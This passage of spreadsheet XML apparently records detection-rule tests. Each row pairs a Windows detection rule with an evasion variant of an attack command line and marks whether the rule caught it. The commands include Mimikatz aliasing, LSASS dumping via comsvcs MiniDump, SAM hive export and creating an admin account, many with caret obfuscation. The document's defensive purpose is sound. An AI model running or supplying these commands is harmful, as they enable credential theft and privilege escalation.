    <row r="1070" ht="15.75" customHeight="1" s="42">
      <c r="A1070" s="43" t="n"/>
      <c r="B1070" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1070" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1070" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1070" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1070" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1070" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1070" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107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70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1070" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1071" ht="15.75" customHeight="1" s="42">
      <c r="A1071" s="43" t="n"/>
      <c r="B1071" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1071" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1071" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1071" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1071" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1071" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1071" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107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71" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1071" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1072" ht="15.75" customHeight="1" s="42">
      <c r="A1072" s="43" t="n"/>
      <c r="B1072" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1072" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1072" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1072" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1072" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1072" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1072" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10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72" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1072" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1073" ht="15.75" customHeight="1" s="42">
      <c r="A1073" s="43" t="n"/>
      <c r="B1073" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1073" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1073" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1073" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1073" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1073" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1073" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107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73" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1073" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1074" ht="15.75" customHeight="1" s="42">
      <c r="A1074" s="43" t="n"/>
      <c r="B1074" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1074" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1074" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1074" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1074" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1074" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1074" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107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074" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1074" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1075" ht="15.75" customHeight="1" s="42">
      <c r="A1075" s="43" t="n"/>
      <c r="B1075" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_seatbelt</t>
        </is>
      </c>
      <c r="C1075" s="36" t="inlineStr">
        <is>
          <t>PUA - Seatbelt Execution</t>
        </is>
      </c>
      <c r="D1075" s="36" t="inlineStr">
        <is>
          <t>38646daa-e78f-4ace-9de0-55547b2d30da</t>
        </is>
      </c>
      <c r="E1075" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Data\Seatbelt.dll,main FullDFIR</t>
        </is>
      </c>
      <c r="F1075" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1075" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1075" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1075" s="43" t="n"/>
      <c r="J1075" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1075" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1076" ht="15.75" customHeight="1" s="42">
      <c r="A1076" s="43" t="n"/>
      <c r="B1076" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1076" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1076" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1076" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -d 1 security</t>
        </is>
      </c>
      <c r="F1076" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1076" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1076" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1076" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1076" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1076" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1077" ht="15.75" customHeight="1" s="42">
      <c r="A1077" s="43" t="n"/>
      <c r="B1077" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1077" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1077" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1077" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe /"d" 1 security</t>
        </is>
      </c>
      <c r="F1077" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1077" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1077" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1077" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1077" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1077" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1078" ht="15.75" customHeight="1" s="42">
      <c r="A1078" s="43" t="n"/>
      <c r="B1078" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1078" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1078" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1078" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -"d" 1 security</t>
        </is>
      </c>
      <c r="F1078" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1078" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1078" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1078" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1078" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1078" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1079" ht="15.75" customHeight="1" s="42">
      <c r="A1079" s="43" t="n"/>
      <c r="B1079" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1079" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1079" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1079" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -D 1 security</t>
        </is>
      </c>
      <c r="F1079" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1079" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1079" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1079" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1079" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1079" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1080" ht="15.75" customHeight="1" s="42">
      <c r="A1080" s="43" t="n"/>
      <c r="B1080" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1080" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1080" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1080" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1080" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1080" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1080" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1080" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J1080" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1080" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1081" ht="15.75" customHeight="1" s="42">
      <c r="A1081" s="43" t="n"/>
      <c r="B1081" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1081" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1081" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1081" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1081" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1081" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1081" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1081" s="43" t="n"/>
      <c r="J1081" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1081" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1082" ht="15.75" customHeight="1" s="42">
      <c r="A1082" s="43" t="n"/>
      <c r="B1082" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1082" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1082" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1082" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1082" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1082" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1082" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1082" s="43" t="n"/>
      <c r="J1082" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1082" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1083" ht="15.75" customHeight="1" s="42">
      <c r="A1083" s="43" t="n"/>
      <c r="B1083" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1083" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1083" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1083" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1083" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1083" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1083" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1083" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J1083" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1083" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1084" ht="15.75" customHeight="1" s="42">
      <c r="A1084" s="43" t="n"/>
      <c r="B1084" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1084" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1084" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1084" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F1084" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1084" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1084" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1084" s="36" t="n"/>
      <c r="J1084" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1084" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1085" ht="15.75" customHeight="1" s="42">
      <c r="A1085" s="43" t="n"/>
      <c r="B1085" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1085" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1085" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1085" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1085" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1085" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1085" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1085" s="36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1085" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1085" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1086" ht="15.75" customHeight="1" s="42">
      <c r="A1086" s="43" t="n"/>
      <c r="B1086" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1086" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1086" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1086" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1086" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1086" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1086" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1086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1086" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1086" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1087" ht="15.75" customHeight="1" s="42">
      <c r="A1087" s="43" t="n"/>
      <c r="B1087" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1087" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1087" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1087" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1087" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1087" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1087" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1087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1087" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1087" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1088" ht="15.75" customHeight="1" s="42">
      <c r="A1088" s="43" t="n"/>
      <c r="B1088" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1088" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1088" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1088" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1088" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1088" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1088" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1088" s="36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1088" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1088" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1089" ht="15.75" customHeight="1" s="42">
      <c r="A1089" s="43" t="n"/>
      <c r="B1089" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1089" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1089" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1089" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1089" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1089" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1089" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1089" s="43" t="n"/>
      <c r="J1089" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1089" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1090" ht="15.75" customHeight="1" s="42">
      <c r="A1090" s="43" t="n"/>
      <c r="B1090" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1090" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1090" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1090" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1090" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1090" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1090" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1090" s="36" t="n"/>
      <c r="J1090" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1090" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1091" ht="15.75" customHeight="1" s="42">
      <c r="A1091" s="43" t="n"/>
      <c r="B1091" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1091" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1091" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1091" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1091" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1091" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1091" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1091" s="43" t="n"/>
      <c r="J1091" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1091" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1092" ht="15.75" customHeight="1" s="42">
      <c r="A1092" s="43" t="n"/>
      <c r="B1092" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1092" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1092" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1092" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1092" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1092" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1092" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1092" s="43" t="n"/>
      <c r="J1092" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1092" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1093" ht="15.75" customHeight="1" s="42">
      <c r="A1093" s="43" t="n"/>
      <c r="B1093" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1093" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1093" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1093" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F1093" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1093" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1093" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1093" s="43" t="n"/>
      <c r="J1093" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1093" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1094" ht="15.75" customHeight="1" s="42">
      <c r="A1094" s="43" t="n"/>
      <c r="B1094" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1094" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1094" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1094" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F1094" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1094" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1094" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1094" s="43" t="n"/>
      <c r="J1094" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1094" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1095" ht="15.75" customHeight="1" s="42">
      <c r="A1095" s="43" t="n"/>
      <c r="B1095" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1095" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1095" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1095" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\comsvcs.dll C:\Windows\Temp\c.dll &amp;&amp; rundll32.exe C:\Windows\Temp\c.dll, MiniDump 500 lsass.bin</t>
        </is>
      </c>
      <c r="F1095" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1095" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1095" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1095" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1095" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1095" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1096" ht="15.75" customHeight="1" s="42">
      <c r="A1096" s="43" t="n"/>
      <c r="B1096" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1096" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1096" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1096" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1096" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1096" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1096" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1096" s="43" t="n"/>
      <c r="J1096" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1096" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1097" ht="15.75" customHeight="1" s="42">
      <c r="A1097" s="43" t="n"/>
      <c r="B1097" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1097" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1097" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1097" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1097" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1097" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1097" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1097" s="36" t="n"/>
      <c r="J1097" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1097" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1098" ht="15.75" customHeight="1" s="42">
